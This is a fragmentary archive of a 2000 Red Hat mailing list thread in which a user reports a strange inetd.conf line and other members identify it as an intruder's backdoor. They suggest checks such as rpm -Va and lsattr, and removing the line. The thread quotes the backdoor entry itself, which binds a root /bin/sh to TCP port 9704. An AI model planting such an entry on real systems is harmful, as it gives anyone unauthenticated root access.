On Thu, Oct 05, 2000 at 12:56:26PM -0400, Isaiah Weiner wrote:
On Thu, Oct 05, 2000 at 06:07:36AM -0600, Brian Schneider wrote:
Any other things I should be looking for?
rpm -Va would probably be useful. Particularly for util-linux,
net-tools, procps, and fileutils.
Here's the
On Fri, 6 Oct 2000, Ben Logan wrote:
I was wondering if I might be possible that no-one actually gained
access to the system, but instead I installed a (malicious) package
that added the line.
Not likely. It's a lot more probable that the intruder simply didn't
change any of your binaries,
Hi,
A little while ago, I found the following entry at the end of my
inetd.conf file:
9704 stream tcp nowait root /bin/sh sh -i
I don't remember putting it there and I can't find a corresponding
port number in the /etc/services file. Can anyone tell me what this
is for (I've commented it out
A little while ago, I found the following entry at the end of my
inetd.conf file:
9704 stream tcp nowait root /bin/sh sh -i
You've been hacked. There is no legitimate reason for that happening.
Certainly start taking appropriate precautionary measures...
Run something like "telnet 0 9704"
You've been hacked. Do lsattr /bin/ps and see if it looks like:
/bin/ps
If it doesn't, then you've also got a rootkit installed. Given that it can be damn
annoying to extract all the easter eggs and timebombs left behind you probably want to
re-install.
[EMAIL PROTECTED]
On Thu,
It does look like /bin/ps, so a rootkit is probably not
installed. May be okay. This is just my own system, but I have a lot on it
and want to avoid a re-install, but am trying to think of all I need to
save in order to do it.
Any other things I should be looking for?
Thanks for all
Brian,
Brian Schneider wrote:
It does look like /bin/ps, so a rootkit is probably not
installed. May be okay. This is just my own system, but I have a lot on it
and want to avoid a re-install, but am trying to think of all I need to
save in order to do it.
Any other things I
check out http://tomii.erols.com/firewall.txt for a decent ipchains script
to get you started explain some stuff.
-Original Message-
From: Gustav Schaffter [SMTP:[EMAIL PROTECTED]]
Sent: Thursday, October 05, 2000 8:34 AM
To: [EMAIL PROTECTED]
Subject: Re: Strange entry
On Thu, Oct 05, 2000 at 06:07:36AM -0600, Brian Schneider wrote:
Any other things I should be looking for?
rpm -Va would probably be useful. Particularly for util-linux,
net-tools, procps, and fileutils.
--
- Isaiah
___
Redhat-list
9704 stream tcp nowait root /bin/sh sh -i
I'd remove it.. like now. (and send the HUP signal to inetd). smells like
someone added it for maybe backdoor purposes.
___
Redhat-list mailing list
[EMAIL PROTECTED]
10 matches
Mail list logo